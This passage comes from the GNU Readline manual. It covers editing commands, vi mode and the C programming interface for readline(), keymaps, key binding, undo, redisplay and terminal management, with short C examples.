Stop saving the characters typed into the current keyboard macro and save the
definition.
call-last-kbd-macro (C-x e)
Re-execute the last keyboard macro defined, by making the characters in the
macro appear as if typed at the keyboard.
1.4.8 Some Miscellaneous Commands
re-read-init-file (C-x C-r)
Read in the contents of the inputrc file, and incorporate any bindings or variable
assignments found there.
abort (C-g)
Abort the current editing command and ring the terminal’s bell (subject to the
setting of bell-style).
do-uppercase-version (M-a, M-b, M-x, ...)
If the metafied character x is lowercase, run the command that is bound to the
corresponding uppercase character.
prefix-meta (ESC)
Metafy the next character typed. This is for keyboards without a meta key.
Typing ‘ESC f’ is equivalent to typing M-f.
undo (C-_ or C-x C-u)
Incremental undo, separately remembered for each line.
revert-line (M-r)
Undo all changes made to this line. This is like executing the undo command
enough times to get back to the beginning.
tilde-expand (M-~)
Perform tilde expansion on the current word.
set-mark (C-@)
Set the mark to the point. If a numeric argument is supplied, the mark is set
to that position.
exchange-point-and-mark (C-x C-x)
Swap the point with the mark. The current cursor position is set to the saved
position, and the old cursor position is saved as the mark.
character-search (C-])
A character is read and point is moved to the next occurrence of that character.
A negative count searches for previous occurrences.
character-search-backward (M-C-])
A character is read and point is moved to the previous occurrence of that
character. A negative count searches for subsequent occurrences.
Chapter 1: Command Line Editing
19
skip-csi-sequence ()
Read enough characters to consume a multi-key sequence such as those defined
for keys like Home and End. Such sequences begin with a Control Sequence
Indicator (CSI), usually ESC-[. If this sequence is bound to "\e[", keys pro-
ducing such sequences will have no effect unless explicitly bound to a readline
command, instead of inserting stray characters into the editing buffer. This is
unbound by default, but usually bound to ESC-[.
insert-comment (M-#)
Without a numeric argument, the value of the comment-begin variable is in-
serted at the beginning of the current line. If a numeric argument is supplied,
this command acts as a toggle: if the characters at the beginning of the line
do not match the value of comment-begin, the value is inserted, otherwise the
characters in comment-begin are deleted from the beginning of the line. In
either case, the line is accepted as if a newline had been typed.
dump-functions ()
Print all of the functions and their key bindings to the Readline output stream.
If a numeric argument is supplied, the output is formatted in such a way that
it can be made part of an inputrc file. This command is unbound by default.
dump-variables ()
Print all of the settable variables and their values to the Readline output stream.
If a numeric argument is supplied, the output is formatted in such a way that
it can be made part of an inputrc file. This command is unbound by default.
dump-macros ()
Print all of the Readline key sequences bound to macros and the strings they
output. If a numeric argument is supplied, the output is formatted in such a
way that it can be made part of an inputrc file. This command is unbound by
default.
emacs-editing-mode (C-e)
When in vi command mode, this causes a switch to emacs editing mode.
vi-editing-mode (M-C-j)
When in emacs editing mode, this causes a switch to vi editing mode.
1.5 Readline vi Mode
While the Readline library does not have a full set of vi editing functions, it does contain
enough to allow simple editing of the line. The Readline vi mode behaves as specified in
the posix 1003.2 standard.
In order to switch interactively between emacs and vi editing modes, use the command
M-C-j (bound to emacs-editing-mode when in vi mode and to vi-editing-mode in emacs
mode). The Readline default is emacs mode.
When you enter a line in vi mode, you are already placed in ‘insertion’ mode, as if you
had typed an ‘i’. Pressing ESC switches you into ‘command’ mode, where you can edit the
text of the line with the standard vi movement keys, move to previous history lines with
‘k’ and subsequent lines with ‘j’, and so forth.
Chapter 2: Programming with GNU Readline
20
2 Programming with GNU Readline
This chapter describes the interface between the gnu Readline Library and other programs.
If you are a programmer, and you wish to include the features found in gnu Readline such
as completion, line editing, and interactive history manipulation in your own programs, this
section is for you.
2.1 Basic Behavior
Many programs provide a command line interface, such as mail, ftp, and sh. For such
programs, the default behaviour of Readline is sufficient. This section describes how to use
Readline in the simplest way possible, perhaps to replace calls in your code to gets() or
fgets().
The function readline() prints a prompt prompt and then reads and returns a single
line of text from the user. If prompt is NULL or the empty string, no prompt is displayed.
The line readline returns is allocated with malloc(); the caller should free() the line
when it has finished with it. The declaration for readline in ANSI C is
char *readline (const char *prompt);
So, one might say
char *line = readline ("Enter a line: ");
in order to read a line of text from the user. The line returned has the final newline removed,
so only the text remains.
If readline encounters an EOF while reading the line, and the line is empty at that
point, then (char *)NULL is returned. Otherwise, the line is ended just as if a newline had
been typed.
If you want the user to be able to get at the line later, (with C-p for example), you must
call add_history() to save the line away in a history list of such lines.
add_history (line);
For full details on the GNU History Library, see the associated manual.
It is preferable to avoid saving empty lines on the history list, since users rarely have a
burning need to reuse a blank line. Here is a function which usefully replaces the standard
gets() library function, and has the advantage of no static buffer to overflow:
/* A static variable for holding the line. */
static char *line_read = (char *)NULL;
/* Read a string, and return a pointer to it.
Returns NULL on EOF. */
char *
rl_gets ()
{
/* If the buffer has already been allocated,
return the memory to the free pool. */
if (line_read)
{
free (line_read);
Chapter 2: Programming with GNU Readline
21
line_read = (char *)NULL;
}
/* Get a line from the user. */
line_read = readline ("");
/* If the line has any text in it,
save it on the history. */
if (line_read && *line_read)
add_history (line_read);
return (line_read);
}
This function gives the user the default behaviour of TAB completion: completion on file
names. If you do not want Readline to complete on filenames, you can change the binding
of the TAB key with rl_bind_key().
int rl_bind_key (int key, rl_command_func_t *function);
rl_bind_key() takes two arguments: key is the character that you want to bind, and
function is the address of the function to call when key is pressed. Binding TAB to rl_
insert() makes TAB insert itself. rl_bind_key() returns non-zero if key is not a valid
ASCII character code (between 0 and 255).
Thus, to disable the default TAB behavior, the following suffices:
rl_bind_key (’\t’, rl_insert);
This code should be executed once at the start of your program; you might write a func-
tion called initialize_readline() which performs this and other desired initializations,
such as installing custom completers (see Section 2.6 [Custom Completers], page 41).
2.2 Custom Functions
Readline provides many functions for manipulating the text of the line, but it isn’t possible
to anticipate the needs of all programs. This section describes the various functions and
variables defined within the Readline library which allow a user program to add customized
functionality to Readline.
Before declaring any functions that customize Readline’s behavior, or using any func-
tionality Readline provides in other code, an application writer should include the file
<readline/readline.h> in any file that uses Readline’s features. Since some of the defi-
nitions in readline.h use the stdio library, the file <stdio.h> should be included before
readline.h.
readline.h defines a C preprocessor variable that should be treated as an integer, RL_
READLINE_VERSION, which may be used to conditionally compile application code depending
on the installed Readline version. The value is a hexadecimal encoding of the major and
minor version numbers of the library, of the form 0xMMmm. MM is the two-digit major
version number; mm is the two-digit minor version number. For Readline 4.2, for example,
the value of RL_READLINE_VERSION would be 0x0402.
Chapter 2: Programming with GNU Readline
22
2.2.1 Readline Typedefs
For readabilty, we declare a number of new object types, all pointers to functions.
The reason for declaring these new types is to make it easier to write code describing
pointers to C functions with appropriately prototyped arguments and return values.
For instance, say we want to declare a variable func as a pointer to a function which
takes two int arguments and returns an int (this is the type of all of the Readline bindable
functions). Instead of the classic C declaration
int (*func)();
or the ANSI-C style declaration
int (*func)(int, int);
we may write
rl_command_func_t *func;
The full list of function pointer types available is
typedef int rl_command_func_t (int, int);
typedef char *rl_compentry_func_t (const char *, int);
typedef char **rl_completion_func_t (const char *, int, int);
typedef char *rl_quote_func_t (char *, int, char *);
typedef char *rl_dequote_func_t (char *, int);
typedef int rl_compignore_func_t (char **);
typedef void rl_compdisp_func_t (char **, int, int);
typedef int rl_hook_func_t (void);
typedef int rl_getc_func_t (FILE *);
typedef int rl_linebuf_func_t (char *, int);
typedef int rl_intfunc_t (int);
#define rl_ivoidfunc_t rl_hook_func_t
typedef int rl_icpfunc_t (char *);
typedef int rl_icppfunc_t (char **);
typedef void rl_voidfunc_t (void);
typedef void rl_vintfunc_t (int);
typedef void rl_vcpfunc_t (char *);
typedef void rl_vcppfunc_t (char **);
2.2.2 Writing a New Function
In order to write new functions for Readline, you need to know the calling conventions for
keyboard-invoked functions, and the names of the variables that describe the current state
of the line read so far.
The calling sequence for a command foo looks like
int foo (int count, int key)
where count is the numeric argument (or 1 if defaulted) and key is the key that invoked
this function.
It is completely up to the function as to what should be done with the numeric argument.
Some functions use it as a repeat count, some as a flag, and others to choose alternate
behavior (refreshing the current line as opposed to refreshing the screen, for example).
Chapter 2: Programming with GNU Readline
23
Some choose to ignore it. In general, if a function uses the numeric argument as a repeat
count, it should be able to do something useful with both negative and positive arguments.
At the very least, it should be aware that it can be passed a negative argument.
A command function should return 0 if its action completes successfully, and a non-zero
value if some error occurs. This is the convention obeyed by all of the builtin Readline
bindable command functions.
2.3 Readline Variables
These variables are available to function writers.
[Variable]
char * rl_line_buffer
This is the line gathered so far. You are welcome to modify the contents of the line,
but see Section 2.4.5 [Allowing Undoing], page 31. The function rl_extend_line_
buffer is available to increase the memory allocated to rl_line_buffer.
[Variable]
int rl_point
The offset of the current cursor position in rl_line_buffer (the point).
[Variable]
int rl_end
The number of characters present in rl_line_buffer. When rl_point is at the end
of the line, rl_point and rl_end are equal.
[Variable]
int rl_mark
The mark (saved position) in the current line. If set, the mark and point define a
region.
[Variable]
int rl_done
Setting this to a non-zero value causes Readline to return the current line immediately.
[Variable]
int rl_num_chars_to_read
Setting this to a positive value before calling readline() causes Readline to return
after accepting that many characters, rather than reading up to a character bound
to accept-line.
[Variable]
int rl_pending_input
Setting this to a value makes it the next keystroke read. This is a way to stuff a single
character into the input stream.
[Variable]
int rl_dispatching
Set to a non-zero value if a function is being called from a key binding; zero otherwise.
Application functions can test this to discover whether they were called directly or
by Readline’s dispatching mechanism.
[Variable]
int rl_erase_empty_line
Setting this to a non-zero value causes Readline to completely erase the current
line, including any prompt, any time a newline is typed as the only character on
an otherwise-empty line. The cursor is moved to the beginning of the newly-blank
line.
Chapter 2: Programming with GNU Readline
24
[Variable]
char * rl_prompt
The prompt Readline uses. This is set from the argument to readline(), and should
not be assigned to directly. The rl_set_prompt() function (see Section 2.4.6 [Redis-
play], page 32) may be used to modify the prompt string after calling readline().
[Variable]
char * rl_display_prompt
The string displayed as the prompt. This is usually identical to rl prompt, but may
be changed temporarily by functions that use the prompt string as a message area,
such as incremental search.
[Variable]
int rl_already_prompted
If an application wishes to display the prompt itself, rather than have Readline do
it the first time readline() is called, it should set this variable to a non-zero value
after displaying the prompt. The prompt must also be passed as the argument to
readline() so the redisplay functions can update the display properly. The calling
application is responsible for managing the value; Readline never sets it.
[Variable]
const char * rl_library_version
The version number of this revision of the library.
[Variable]
int rl_readline_version
An integer encoding the current version of the library. The encoding is of the form
0xMMmm, where MM is the two-digit major version number, and mm is the two-
digit minor version number. For example, for Readline-4.2, rl_readline_version
would have the value 0x0402.
[Variable]
int rl_gnu_readline_p
Always set to 1, denoting that this is gnu readline rather than some emulation.
[Variable]
const char * rl_terminal_name
The terminal type, used for initialization. If not set by the application, Readline sets
this to the value of the TERM environment variable the first time it is called.
[Variable]
const char * rl_readline_name
This variable is set to a unique name by each application using Readline. The value
allows conditional parsing of the inputrc file (see Section 1.3.2 [Conditional Init Con-
structs], page 10).
[Variable]
FILE * rl_instream
The stdio stream from which Readline reads input. If NULL, Readline defaults to
stdin.
[Variable]
FILE * rl_outstream
The stdio stream to which Readline performs output. If NULL, Readline defaults to
stdout.
[Variable]
int rl_prefer_env_winsize
If non-zero, Readline gives values found in the LINES and COLUMNS environment vari-
ables greater precedence than values fetched from the kernel when computing the
screen dimensions.
Chapter 2: Programming with GNU Readline
25
[Variable]
rl_command_func_t * rl_last_func
The address of the last command function Readline executed. May be used to test
whether or not a function is being executed twice in succession, for example.
[Variable]
rl_hook_func_t * rl_startup_hook
If non-zero, this is the address of a function to call just before readline prints the
first prompt.
[Variable]
rl_hook_func_t * rl_pre_input_hook
If non-zero, this is the address of a function to call after the first prompt has been
printed and just before readline starts reading input characters.
[Variable]
rl_hook_func_t * rl_event_hook
If non-zero, this is the address of a function to call periodically when Readline is
waiting for terminal input. By default, this will be called at most ten times a second
if there is no keyboard input.
[Variable]
rl_getc_func_t * rl_getc_function
If non-zero, Readline will call indirectly through this pointer to get a character from
the input stream. By default, it is set to rl_getc, the default Readline character
input function (see Section 2.4.8 [Character Input], page 34).
[Variable]
rl_voidfunc_t * rl_redisplay_function
If non-zero, Readline will call indirectly through this pointer to update the display
with the current contents of the editing buffer. By default, it is set to rl_redisplay,
the default Readline redisplay function (see Section 2.4.6 [Redisplay], page 32).
[Variable]
rl_vintfunc_t * rl_prep_term_function
If non-zero, Readline will call indirectly through this pointer to initialize the terminal.
The function takes a single argument, an int flag that says whether or not to use
eight-bit characters. By default, this is set to rl_prep_terminal (see Section 2.4.9
[Terminal Management], page 34).
[Variable]
rl_voidfunc_t * rl_deprep_term_function
If non-zero, Readline will call indirectly through this pointer to reset the terminal.
This function should undo the effects of rl_prep_term_function. By default, this
is set to rl_deprep_terminal (see Section 2.4.9 [Terminal Management], page 34).
[Variable]
Keymap rl_executing_keymap
This variable is set to the keymap (see Section 2.4.2 [Keymaps], page 28) in which
the currently executing readline function was found.
[Variable]
Keymap rl_binding_keymap
This variable is set to the keymap (see Section 2.4.2 [Keymaps], page 28) in which
the last key binding occurred.
[Variable]
char * rl_executing_macro
This variable is set to the text of any currently-executing macro.
Chapter 2: Programming with GNU Readline
26
[Variable]
int rl_readline_state
A variable with bit values that encapsulate the current Readline state. A bit is set
with the RL_SETSTATE macro, and unset with the RL_UNSETSTATE macro. Use the
RL_ISSTATE macro to test whether a particular state bit is set. Current state bits
include:
RL_STATE_NONE
Readline has not yet been called, nor has it begun to intialize.
RL_STATE_INITIALIZING
Readline is initializing its internal data structures.
RL_STATE_INITIALIZED
Readline has completed its initialization.
RL_STATE_TERMPREPPED
Readline has modified the terminal modes to do its own input and redis-
play.
RL_STATE_READCMD
Readline is reading a command from the keyboard.
RL_STATE_METANEXT
Readline is reading more input after reading the meta-prefix character.
RL_STATE_DISPATCHING
Readline is dispatching to a command.
RL_STATE_MOREINPUT
Readline is reading more input while executing an editing command.
RL_STATE_ISEARCH
Readline is performing an incremental history search.
RL_STATE_NSEARCH
Readline is performing a non-incremental history search.
RL_STATE_SEARCH
Readline is searching backward or forward through the history for a string.
RL_STATE_NUMERICARG
Readline is reading a numeric argument.
RL_STATE_MACROINPUT
Readline is currently getting its input from a previously-defined keyboard
macro.
RL_STATE_MACRODEF
Readline is currently reading characters defining a keyboard macro.
RL_STATE_OVERWRITE
Readline is in overwrite mode.
RL_STATE_COMPLETING
Readline is performing word completion.
Chapter 2: Programming with GNU Readline
27
RL_STATE_SIGHANDLER
Readline is currently executing the readline signal handler.
RL_STATE_UNDOING
Readline is performing an undo.
RL_STATE_INPUTPENDING
Readline has input pending due to a call to rl_execute_next().
RL_STATE_TTYCSAVED
Readline has saved the values of the terminal’s special characters.
RL_STATE_CALLBACK
Readline is currently using the alternate (callback) interface (see Sec-
tion 2.4.12 [Alternate Interface], page 37).
RL_STATE_VIMOTION
Readline is reading the argument to a vi-mode "motion" command.
RL_STATE_MULTIKEY
Readline is reading a multiple-keystroke command.
RL_STATE_VICMDONCE
Readline has entered vi command (movement) mode at least one time
during the current call to readline().
RL_STATE_DONE
Readline has read a key sequence bound to accept-line and is about to
return the line to the caller.
[Variable]
int rl_explicit_arg
Set to a non-zero value if an explicit numeric argument was specified by the user.
Only valid in a bindable command function.
[Variable]
int rl_numeric_arg
Set to the value of any numeric argument explicitly specified by the user before
executing the current Readline function. Only valid in a bindable command function.
[Variable]
int rl_editing_mode
Set to a value denoting Readline’s current editing mode. A value of 1 means Readline
is currently in emacs mode; 0 means that vi mode is active.
2.4 Readline Convenience Functions
2.4.1 Naming a Function
The user can dynamically change the bindings of keys while using Readline. This is done by
representing the function with a descriptive name. The user is able to type the descriptive
name when referring to the function. Thus, in an init file, one might find
Meta-Rubout:
backward-kill-word
This binds the keystroke Meta-Rubout to the function descriptively named backward-
kill-word. You, as the programmer, should bind the functions you write to descriptive
names as well. Readline provides a function for doing that:
Chapter 2: Programming with GNU Readline
28
[Function]
int rl_add_defun (const char *name, rl command func t *function, int
key)
Add name to the list of named functions. Make function be the function that gets
called. If key is not -1, then bind it to function using rl_bind_key().
Using this function alone is sufficient for most applications. It is the recommended way
to add a few functions to the default functions that Readline has built in. If you need to do
something other than adding a function to Readline, you may need to use the underlying
functions described below.
2.4.2 Selecting a Keymap
Key bindings take place on a keymap. The keymap is the association between the keys
that the user types and the functions that get run. You can make your own keymaps, copy
existing keymaps, and tell Readline which keymap to use.
[Function]
Keymap rl_make_bare_keymap (void)
Returns a new, empty keymap. The space for the keymap is allocated with malloc();
the caller should free it by calling rl_free_keymap() when done.
[Function]
Keymap rl_copy_keymap (Keymap map)
Return a new keymap which is a copy of map.
[Function]
Keymap rl_make_keymap (void)
Return a new keymap with the printing characters bound to rl insert, the lowercase
Meta characters bound to run their equivalents, and the Meta digits bound to produce
numeric arguments.
[Function]
void rl_discard_keymap (Keymap keymap)
Free the storage associated with the data in keymap. The caller should free keymap.
[Function]
void rl_free_keymap (Keymap keymap)
Free all storage associated with keymap. This calls rl_discard_keymap to free sub-
ordindate keymaps and macros.
Readline has several internal keymaps.
These functions allow you to change which
keymap is active.
[Function]
Keymap rl_get_keymap (void)
Returns the currently active keymap.
[Function]
void rl_set_keymap (Keymap keymap)
Makes keymap the currently active keymap.
[Function]
Keymap rl_get_keymap_by_name (const char *name)
Return the keymap matching name. name is one which would be supplied in a set
keymap inputrc line (see Section 1.3 [Readline Init File], page 4).
[Function]
char * rl_get_keymap_name (Keymap keymap)
Return the name matching keymap. name is one which would be supplied in a set
keymap inputrc line (see Section 1.3 [Readline Init File], page 4).
Chapter 2: Programming with GNU Readline
29
2.4.3 Binding Keys
Key sequences are associate with functions through the keymap. Readline has several in-
ternal keymaps: emacs_standard_keymap, emacs_meta_keymap, emacs_ctlx_keymap, vi_
movement_keymap, and vi_insertion_keymap.
emacs_standard_keymap is the default,
and the examples in this manual assume that.
Since readline() installs a set of default key bindings the first time it is called, there is
always the danger that a custom binding installed before the first call to readline() will
be overridden. An alternate mechanism is to install custom key bindings in an initialization
function assigned to the rl_startup_hook variable (see Section 2.3 [Readline Variables],
page 23).
These functions manage key bindings.
[Function]
int rl_bind_key (int key, rl command func t *function)
Binds key to function in the currently active keymap. Returns non-zero in the case
of an invalid key.
[Function]
int rl_bind_key_in_map (int key, rl command func t *function,
Keymap map)
Bind key to function in map. Returns non-zero in the case of an invalid key.
[Function]
int rl_bind_key_if_unbound (int key, rl command func t *function)
Binds key to function if it is not already bound in the currently active keymap.
Returns non-zero in the case of an invalid key or if key is already bound.
[Function]
int rl_bind_key_if_unbound_in_map (int key, rl command func t
*function, Keymap map)
Binds key to function if it is not already bound in map. Returns non-zero in the case
of an invalid key or if key is already bound.
[Function]
int rl_unbind_key (int key)
Bind key to the null function in the currently active keymap. Returns non-zero in
case of error.
[Function]
int rl_unbind_key_in_map (int key, Keymap map)
Bind key to the null function in map. Returns non-zero in case of error.
[Function]
int rl_unbind_function_in_map (rl command func t *function,
Keymap map)
Unbind all keys that execute function in map.
[Function]
int rl_unbind_command_in_map (const char *command, Keymap map)
Unbind all keys that are bound to command in map.
[Function]
int rl_bind_keyseq (const char *keyseq, rl command func t *function)
Bind the key sequence represented by the string keyseq to the function function,
beginning in the current keymap. This makes new keymaps as necessary. The return
value is non-zero if keyseq is invalid.
Chapter 2: Programming with GNU Readline
30
[Function]
int rl_bind_keyseq_in_map (const char *keyseq, rl command func t
*function, Keymap map)
Bind the key sequence represented by the string keyseq to the function function. This
makes new keymaps as necessary. Initial bindings are performed in map. The return
value is non-zero if keyseq is invalid.
[Function]
int rl_set_key (const char *keyseq, rl command func t *function,
Keymap map)
Equivalent to rl_bind_keyseq_in_map.
[Function]
int rl_bind_keyseq_if_unbound (const char *keyseq,
rl command func t *function)
Binds keyseq to function if it is not already bound in the currently active keymap.
Returns non-zero in the case of an invalid keyseq or if keyseq is already bound.
[Function]
int rl_bind_keyseq_if_unbound_in_map (const char *keyseq,
rl command func t *function, Keymap map)
Binds keyseq to function if it is not already bound in map. Returns non-zero in the
case of an invalid keyseq or if keyseq is already bound.
[Function]
int rl_generic_bind (int type, const char *keyseq, char *data, Keymap
map)
Bind the key sequence represented by the string keyseq to the arbitrary pointer data.
type says what kind of data is pointed to by data; this can be a function (ISFUNC), a
macro (ISMACR), or a keymap (ISKMAP). This makes new keymaps as necessary. The
initial keymap in which to do bindings is map.
[Function]
int rl_parse_and_bind (char *line)
Parse line as if it had been read from the inputrc file and perform any key bindings
and variable assignments found (see Section 1.3 [Readline Init File], page 4).
[Function]
int rl_read_init_file (const char *filename)
Read keybindings and variable assignments from filename (see Section 1.3 [Readline
Init File], page 4).
2.4.4 Associating Function Names and Bindings
These functions allow you to find out what keys invoke named functions and the functions
invoked by a particular key sequence. You may also associate a new function name with an
arbitrary function.
[Function]
rl_command_func_t * rl_named_function (const char *name)
Return the function with name name.
[Function]
rl_command_func_t * rl_function_of_keyseq (const char *keyseq,
Keymap map, int *type)
Return the function invoked by keyseq in keymap map. If map is NULL, the current
keymap is used. If type is not NULL, the type of the object is returned in the int
variable it points to (one of ISFUNC, ISKMAP, or ISMACR).
Chapter 2: Programming with GNU Readline
31
[Function]
char ** rl_invoking_keyseqs (rl command func t *function)
Return an array of strings representing the key sequences used to invoke function in
the current keymap.
[Function]
char ** rl_invoking_keyseqs_in_map (rl command func t
*function, Keymap map)
Return an array of strings representing the key sequences used to invoke function in
the keymap map.
[Function]
void rl_function_dumper (int readable)
Print the readline function names and the key sequences currently bound to them to
rl_outstream. If readable is non-zero, the list is formatted in such a way that it can
be made part of an inputrc file and re-read.
[Function]
void rl_list_funmap_names (void)
Print the names of all bindable Readline functions to rl_outstream.
[Function]
const char ** rl_funmap_names (void)
Return a NULL terminated array of known function names. The array is sorted. The
array itself is allocated, but not the strings inside. You should free the array, but not
the pointers, using free or rl_free when you are done.
[Function]
int rl_add_funmap_entry (const char *name, rl command func t
*function)
Add name to the list of bindable Readline command names, and make function the
function to be called when name is invoked.
2.4.5 Allowing Undoing
Supporting the undo command is a painless thing, and makes your functions much more
useful. It is certainly easy to try something if you know you can undo it.
If your function simply inserts text once, or deletes text once, and uses rl_insert_
text() or rl_delete_text() to do it, then undoing is already done for you automatically.
If you do multiple insertions or multiple deletions, or any combination of these operations,
you should group them together into one operation. This is done with rl_begin_undo_
group() and rl_end_undo_group().
The types of events that can be undone are:
enum undo_code { UNDO_DELETE, UNDO_INSERT, UNDO_BEGIN, UNDO_END };
Notice that UNDO_DELETE means to insert some text, and UNDO_INSERT means to delete
some text. That is, the undo code tells what to undo, not how to undo it. UNDO_BEGIN and
UNDO_END are tags added by rl_begin_undo_group() and rl_end_undo_group().
[Function]
int rl_begin_undo_group (void)
Begins saving undo information in a group construct. The undo information usually
comes from calls to rl_insert_text() and rl_delete_text(), but could be the
result of calls to rl_add_undo().
[Function]
int rl_end_undo_group (void)
Closes the current undo group started with rl_begin_undo_group (). There should
be one call to rl_end_undo_group() for each call to rl_begin_undo_group().
Chapter 2: Programming with GNU Readline
32
[Function]
void rl_add_undo (enum undo code what, int start, int end, char *text)
Remember how to undo an event (according to what). The affected text runs from
start to end, and encompasses text.
[Function]
void rl_free_undo_list (void)
Free the existing undo list.
[Function]
int rl_do_undo (void)
Undo the first thing on the undo list. Returns 0 if there was nothing to undo, non-zero
if something was undone.
Finally, if you neither insert nor delete text, but directly modify the existing text (e.g.,
change its case), call rl_modifying() once, just before you modify the text. You must
supply the indices of the text range that you are going to modify.
[Function]
int rl_modifying (int start, int end)
Tell Readline to save the text between start and end as a single undo unit. It is
assumed that you will subsequently modify that text.
2.4.6 Redisplay
[Function]
void rl_redisplay (void)
Change what’s displayed on the screen to reflect the current contents of rl_line_
buffer.
[Function]
int rl_forced_update_display (void)
Force the line to be updated and redisplayed, whether or not Readline thinks the
screen display is correct.
[Function]
int rl_on_new_line (void)
Tell the update functions that we have moved onto a new (empty) line, usually after
ouputting a newline.
[Function]
int rl_on_new_line_with_prompt (void)
Tell the update functions that we have moved onto a new line, with rl prompt already
displayed. This could be used by applications that want to output the prompt string
themselves, but still need Readline to know the prompt string length for redisplay. It
should be used after setting rl already prompted.
[Function]
int rl_reset_line_state (void)
Reset the display state to a clean state and redisplay the current line starting on a
new line.
[Function]
int rl_crlf (void)
Move the cursor to the start of the next screen line.
[Function]
int rl_show_char (int c)
Display character c on rl_outstream. If Readline has not been set to display meta
characters directly, this will convert meta characters to a meta-prefixed key sequence.
This is intended for use by applications which wish to do their own redisplay.
Chapter 2: Programming with GNU Readline
33
[Function]
int rl_message (const char *, . . .)
The arguments are a format string as would be supplied to printf, possibly containing
conversion specifications such as ‘%d’, and any additional arguments necessary to
satisfy the conversion specifications.
The resulting string is displayed in the echo
area. The echo area is also used to display numeric arguments and search strings.
You should call rl_save_prompt to save the prompt information before calling this
function.
[Function]
int rl_clear_message (void)
Clear the message in the echo area. If the prompt was saved with a call to rl_save_
prompt before the last call to rl_message, call rl_restore_prompt before calling
this function.
[Function]
void rl_save_prompt (void)
Save the local Readline prompt display state in preparation for displaying a new
message in the message area with rl_message().
[Function]
void rl_restore_prompt (void)
Restore the local Readline prompt display state saved by the most recent call to
rl_save_prompt.
if rl_save_prompt was called to save the prompt before a call
to rl_message, this function should be called before the corresponding call to rl_
clear_message.
[Function]
int rl_expand_prompt (char *prompt)
Expand any special character sequences in prompt and set up the local Readline
prompt redisplay variables. This function is called by readline(). It may also be
called to expand the primary prompt if the rl_on_new_line_with_prompt() function
or rl_already_prompted variable is used. It returns the number of visible characters
on the last line of the (possibly multi-line) prompt. Applications may indicate that
the prompt contains characters that take up no physical screen space when displayed
by bracketing a sequence of such characters with the special markers RL_PROMPT_
START_IGNORE and RL_PROMPT_END_IGNORE (declared in ‘readline.h’. This may be
used to embed terminal-specific escape sequences in prompts.
[Function]
int rl_set_prompt (const char *prompt)
Make Readline use prompt for subsequent redisplay. This calls rl_expand_prompt()
to expand the prompt and sets rl_prompt to the result.
2.4.7 Modifying Text
[Function]
int rl_insert_text (const char *text)
Insert text into the line at the current cursor position. Returns the number of char-
acters inserted.
[Function]
int rl_delete_text (int start, int end)
Delete the text between start and end in the current line. Returns the number of
characters deleted.
[Function]
char * rl_copy_text (int start, int end)
Return a copy of the text between start and end in the current line.
Chapter 2: Programming with GNU Readline
34
[Function]
int rl_kill_text (int start, int end)
Copy the text between start and end in the current line to the kill ring, appending
or prepending to the last kill if the last command was a kill command. The text is
deleted. If start is less than end, the text is appended, otherwise prepended. If the
last command was not a kill, a new kill ring slot is used.
[Function]
int rl_push_macro_input (char *macro)
Cause macro to be inserted into the line, as if it had been invoked by a key bound to
a macro. Not especially useful; use rl_insert_text() instead.
2.4.8 Character Input
[Function]
int rl_read_key (void)
Return the next character available from Readline’s current input stream. This han-
dles input inserted into the input stream via rl pending input (see Section 2.3 [Read-
line Variables], page 23) and rl_stuff_char(), macros, and characters read from
the keyboard. While waiting for input, this function will call any function assigned
to the rl_event_hook variable.
[Function]
int rl_getc (FILE *stream)
Return the next character available from stream, which is assumed to be the keyboard.
[Function]
int rl_stuff_char (int c)
Insert c into the Readline input stream. It will be "read" before Readline attempts
to read characters from the terminal with rl_read_key(). Up to 512 characters may
be pushed back. rl_stuff_char returns 1 if the character was successfully inserted;
0 otherwise.
[Function]
int rl_execute_next (int c)
Make c be the next command to be executed when rl_read_key() is called. This
sets rl pending input.
[Function]
int rl_clear_pending_input (void)
Unset rl pending input, effectively negating the effect of any previous call to rl_
execute_next(). This works only if the pending input has not already been read
with rl_read_key().
[Function]
int rl_set_keyboard_input_timeout (int u)
While waiting for keyboard input in rl_read_key(), Readline will wait for u mi-
croseconds for input before calling any function assigned to rl_event_hook. u must
be greater than or equal to zero (a zero-length timeout is equivalent to a poll). The
default waiting period is one-tenth of a second. Returns the old timeout value.
2.4.9 Terminal Management
[Function]
void rl_prep_terminal (int meta flag)
Modify the terminal settings for Readline’s use, so readline() can read a single
character at a time from the keyboard. The meta flag argument should be non-zero
if Readline should read eight-bit input.
Chapter 2: Programming with GNU Readline
35
[Function]
void rl_deprep_terminal (void)
Undo the effects of rl_prep_terminal(), leaving the terminal in the state in which
it was before the most recent call to rl_prep_terminal().
[Function]
void rl_tty_set_default_bindings (Keymap kmap)
Read the operating system’s terminal editing characters (as would be displayed by
stty) to their Readline equivalents. The bindings are performed in kmap.
[Function]
void rl_tty_unset_default_bindings (Keymap kmap)
Reset the bindings manipulated by rl_tty_set_default_bindings so that the ter-
minal editing characters are bound to rl_insert. The bindings are performed in
kmap.
[Function]
int rl_reset_terminal (const char *terminal name)
Reinitialize Readline’s idea of the terminal settings using terminal name as the termi-
nal type (e.g., vt100). If terminal name is NULL, the value of the TERM environment
variable is used.
2.4.10 Utility Functions
[Function]
int rl_save_state (struct readline state *sp)
Save a snapshot of Readline’s internal state to sp. The contents of the readline state
structure are documented in ‘readline.h’. The caller is responsible for allocating
the structure.
[Function]
int rl_restore_state (struct readline state *sp)
Restore Readline’s internal state to that stored in sp, which must have been saved by a
call to rl_save_state. The contents of the readline state structure are documented
in ‘readline.h’. The caller is responsible for freeing the structure.
[Function]
void rl_free (void *mem)
Deallocate the memory pointed to by mem. mem must have been allocated by malloc.
[Function]
void rl_replace_line (const char *text, int clear undo)
Replace the contents of rl_line_buffer with text. The point and mark are pre-
served, if possible. If clear undo is non-zero, the undo list associated with the current
line is cleared.
[Function]
void rl_extend_line_buffer (int len)
Ensure that rl_line_buffer has enough space to hold len characters, possibly real-
locating it if necessary.
[Function]
int rl_initialize (void)
Initialize or re-initialize Readline’s internal state. It’s not strictly necessary to call
this; readline() calls it before reading any input.
[Function]
int rl_ding (void)
Ring the terminal bell, obeying the setting of bell-style.
[Function]
int rl_alphabetic (int c)
Return 1 if c is an alphabetic character.
Chapter 2: Programming with GNU Readline
36
[Function]
void rl_display_match_list (char **matches, int len, int max)
A convenience function for displaying a list of strings in columnar format on Read-
line’s output stream. matches is the list of strings, in argv format, such as a list of
completion matches. len is the number of strings in matches, and max is the length of
the longest string in matches. This function uses the setting of print-completions-
horizontally to select how the matches are displayed (see Section 1.3.1 [Readline
Init File Syntax], page 4).
The following are implemented as macros, defined in chardefs.h. Applications should
refrain from using them.
[Function]
int _rl_uppercase_p (int c)
Return 1 if c is an uppercase alphabetic character.
[Function]
int _rl_lowercase_p (int c)
